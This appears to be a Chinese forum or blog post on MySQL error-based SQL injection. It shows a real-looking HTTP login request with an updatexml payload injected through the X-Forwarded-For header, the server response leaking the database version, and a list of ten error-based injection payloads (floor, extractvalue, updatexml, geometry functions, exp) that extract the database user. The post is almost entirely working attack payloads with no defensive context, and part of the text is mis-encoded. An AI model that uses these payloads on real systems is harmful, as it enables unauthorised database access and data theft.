mysql 报错注入
POST /Model/admin/login.php?action=login HTTP/1.1Host: XXX.com
X-Forwarded-For: ' or updatexml(1,concat(0x7e,(version())),0) or'
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://XXX.com/Model/admin/login.php
Cookie: PHPSESSID=i2m9hu9jtm8l4o71hvct9h0h05
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
username=abc&password=123返回包
HTTP/1.1 200 OK
Server: kangle/3.5.8.2
Date: Tue, 11 Apr 2017 03:21:49 GMT
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />MySQL Query:insert into dg_logs(adminid,admin,type,addtime,ip,memo) values('22','abc','0','1491880909','' or updatexml(1,concat(0x7e,(version())),0) or'','管çåabcç»å½åå°') <br> MySQL Error:XPATH syntax error: '~10.1.16-MariaDB' <br> MySQL Errno:1105 <br> Message:MySQL Query Error
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928204840594-1429421338.png2.extractvalue()select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928205421297-407989251.png3.updatexml()select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928205451969-1920882857.png4.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928205719485-521701933.png5.multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928205942266-563740245.png6.polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928205828281-760176387.png7.multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928210038094-1420034123.png8.linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928210144438-1099086559.png9.multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928210420750-344279412.png10.exp()select * from test where id=1 and exp(~(select * from(select user())a));http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928210533313-2028104812.png
页:
[1]